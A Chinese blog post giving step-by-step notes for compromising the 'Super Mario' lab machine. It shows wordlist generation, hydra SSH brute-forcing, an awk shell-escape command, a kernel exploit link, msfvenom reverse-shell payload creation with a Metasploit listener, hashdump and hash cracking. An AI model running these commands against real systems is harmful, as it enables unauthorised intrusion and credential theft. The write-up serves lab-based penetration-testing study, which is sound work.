

Hu3sky's blog

超级玛丽靶机渗透测试笔记

Hu3sky's blog

超级玛丽靶机渗透测试笔记

Word count: 490 / Reading time: 2 min

 2018/06/06   Share

• 
• 
• 
• 
• 

这里先是思路，有空再详细说明。

1. nmap扫端口，8180->web，22->ssh

2. 进入没什么东西，dirb爆破目录，进入/vhosts，看到主机名

3. vi /etc/hosts 修改 ip 主机名

4. 访问 http://主机名:8180 有页面了。

5. 爆破，进入 /luigi，思路 生成字典，爆破ssh
   生成关键字 cewl http://mario.supermariohost.local:8180/ -d -w /root/桌面/1.txt -d 深度 -w 输出写入文件

6. john --wordlist=1.txt --stdout --rules > passwords 生成字典

7. hydra爆破ssh。登陆ssh。

8. ssh禁用了很多命令。whoami没法用，这里 http://www.4hou.com/penetration/11674.html 参考这篇文章进行绕过。 awk 'BEGIN {system("/bin/sh or /bin/bash")}' 此命令可用

9. 提权，uname-a查看内核版本号。利用https://www.exploit-db.com/raw/37292/ 进行提权。

10. cd/root -> ls 有个flag.zip。加密了，我们用kali msf生成一个shell.elf在本地
    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=本机ip lpost=4444 -f -elf > /var/www/html/shell.elf 生成在web目录下的目的是可以让我们拿到的靶机用wget来直接下载我们的马。

11. 攻击机msf：

    msf > use exploit/multi/handler
    
    Msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
    
    msf exploit(handler) > show options
    
    msf exploit(handler) > set lhost 192.168.0.109
    
    msf exploit(handler) > set lport 4444
    
    msf exploit(handler) > exploit

靶机：
运行 ./shell.elf

msf建立监听

1. download flag.zip /root/下载flag.zip，破解zip，fcrakzip -u -D -p /usr/share/wordlists/rockyou.txt 得到密码。

2. 打开flag，让我们继续解密
   msf下 run post/linux/gather/hashdump 拿到全部hash密文。

3. 破解hash。
   第一步：已知上面压缩文件密码为：ilovepeach，我们创建一个文件把它保存进去。
   第二步：跟上面一样，使用john来匹配生成一些简单的规则当字典，取名：newpass1.txt
   john --wordlist=newpass.txt --stdout --rules > newpass1.txt
   第三步：就是使用john加载上该字典，对刚刚得到的hash继续爆破

得到系统账号密码。

原文作者: Hu3sky

原文链接: http://yoursite.com/2018/06/06/超级玛丽/

发表日期: June 6th 2018, 3:23:00 pm

版权声明: 本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  Linux
• Previous Post
  jarvisoj WP

Powered by Hexotheme Archer

本站总访问量次

本站总访问量: :)

CATALOG



• Archive
• Tag
• Cate

Total : 101

2021

• 01/22Oracle补丁日 ：CVE-2020-14756 漏洞利用及补丁分析
• 01/18CVE-2020-17518/17519：Apache Flink 目录遍历漏洞&路由分析
• 01/042020 总结 & 2021 计划

2020

• 12/11浅析 S2-061
• 10/19Websphere 最新版9.0.5.5 反序列化入口挖掘以及XXE构造
• 04/19Orcale 4月补丁日的几个漏洞以及CVE-2020-2801的简单分析
• 04/08CVE-2020-10204/CVE-2020-10199 Nexus Repository Manager3 分析&以及三个类的回显构造
• 03/20weblogic t3 协议利用与防御
• 03/08CVE-2020-2555 漏洞分析
• 03/06JMX-RMI
• 01/06shiro-1.2.4-rememberMe反序列化分析与基于Commons-Collections3.2.1下的payload构造

2019

• 12/20CVE-2018-1270 Remote Code Execution with spring-messaging 分析
• 10/20Joomla 3.4.6 远程代码执行
• 10/16WebLogic-XMLDecoder反序列化分析
• 10/05Fastjson反序列化漏洞以及多版本补丁分析
• 10/02JAVA XXE
• 09/24Thinkphp多个版本注入分析
• 09/20Thinkphp3个版本数据库操作以及底层代码分析
• 09/13java反序列化由浅入深及JNDI注入理解(二)-JAVA Apache-Commons-Collections
• 09/10Ciscn华北赛区Dropbox题解
• 09/08java反序列化由浅入深及JNDI注入理解(一)-Spring反序列化
• 09/062019护网杯esaypy
• 09/04php-fpm&fast-cgi学习
• 08/24java安全漏洞入门之 s2-001
• 08/24java安全漏洞入门之 s2-003&s2-005
• 08/21.user.ini后门
• 08/15laravel5.7-unserialize-RCE
• 08/08De1CTF Ssrfme 详解
• 08/06深入理解浏览器编码
• 05/13bypassUAC_via_comhijacking
• 05/07JavaScript Prototype 污染攻击之 Code-Breaking-TheJS篇
• 05/06JavaScript Prototype 污染攻击之 基础篇
• 04/24内网中的PowerSploit
• 04/23第12届全国大学生信息安全竞赛Web题解
• 04/22DDCTF部分 Write up
• 04/21How To Use Cobalt Strike(备忘录)
• 04/02Content Security Policy&Bypass
• 04/01跨域相关问题
• 03/27Windows安全下的一些网络认证
• 03/21三层内网搭建&MSF正反向代理穿透
• 02/28WordPress5.0 RCE 分析
• 02/22About OAuth2.0
• 02/20Metinfo 6.1.2 SqlInjection
• 02/16初识Redis未授权访问
• 02/15nullcon ctf 部分web
• 02/1435c3-POST 学习
• 02/11Pwnhub Pink friend 学习
• 02/09LCTF-babyphp's revenge
• 02/07HCTF2018 部分Web
• 01/31从两道CTF实例看python格式化字符串漏洞
• 01/29DiscuzX 3.4 前台SSRF
• 01/28齐博CMSv7审计
• 01/28从SCTF看nginx配置问题
• 01/23Code-Breaking Puzzles
• 01/210ctf-ezdoor
• 01/18Tp5.0.0-5.0.23 RCE学习
• 01/11Thinkphp5.* getshell 分析
• 01/11PHPCMS2008_getshell
• 01/0735C3 CTF 部分解题记录（junior）

2018

• 12/25SWPUCTF_WP
• 12/23寒假学习计划
• 10/06destoon前台getshell复现
• 09/12YXCMS 1.4.7
• 09/12YXCMS 1.4.7 - Arbitrary file deletion
• 09/07反序列化之phar://学习
• 09/06ssh后门
• 09/03Git
• 09/01python装饰器
• 08/30hackme CTF 记录
• 08/25php-security-calendar-2017
• 08/25eyoucms前台getshell复现
• 08/23Hooskcms 几个小洞
• 08/18Hack the ch4inrulz of Vulnhub
• 08/18Bugku sql注入2
• 08/07Vulnhub\|Cyberry靶机
• 07/17java学习笔记
• 07/05暑假学习计划
• 07/03Bob 1.0.1
• 06/29浅谈XML实体注入漏洞
• 06/22Vulnhub Bsides靶机
• 06/11Linux
• 06/06超级玛丽靶机渗透测试笔记
• 06/04jarvisoj WP
• 05/25域渗透练习
• 05/23Empire使用总结
• 05/09ctf一道题目。php反序列化学习
• 05/03记一次kali渗透测试靶机
• 04/25[Untitled Post]
• 04/24i春秋WP
• 04/24实验吧WP
• 04/20scrapy爬虫实例
• 04/17webug wp
• 04/15线下赛总结
• 04/101个月学习计划
• 04/10Scrapy笔记
• 04/01rnpnet tiki-calendar.php页面存在代码执行漏洞
• 03/28cookie与session的笔记
• 03/23VehicleWorkshop上传漏洞本地复现
• 03/16Redtiger题目
• 03/15会员日Pwnhub题目的复现
• 01/13Flask_SSTI



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

CTF writeup 规划 学习计划 渗透测试 浏览器安全 java安全 漏洞分析 备忘录 代码审计 write-up 学习笔记 Linux Arbitrary-File-Upload CVE-Request sql注入 http协议 内网渗透 Empire git php反序列化 JavaScript python scrapy php魔法 xxe 代码执行 内网 后门 线下赛 前端 域渗透

